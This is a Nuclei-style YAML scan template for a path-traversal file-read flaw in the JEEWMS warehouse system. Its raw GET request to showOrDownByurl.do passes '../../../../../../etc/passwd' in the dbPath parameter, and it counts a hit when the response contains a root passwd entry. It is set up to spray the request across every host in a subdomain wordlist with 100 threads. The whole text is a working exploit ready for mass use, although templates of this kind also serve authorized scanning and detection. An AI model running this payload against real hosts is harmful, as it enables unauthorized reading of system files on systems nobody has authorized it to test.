id: jeewms-lfi 1

info:
  name: JEEWMS LFI
  author: pikpikcu
  severity: high
  reference: https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g
  tags: jeewms,lfi

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd  HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"
        part: body

      - type: status
        status:
          - 200
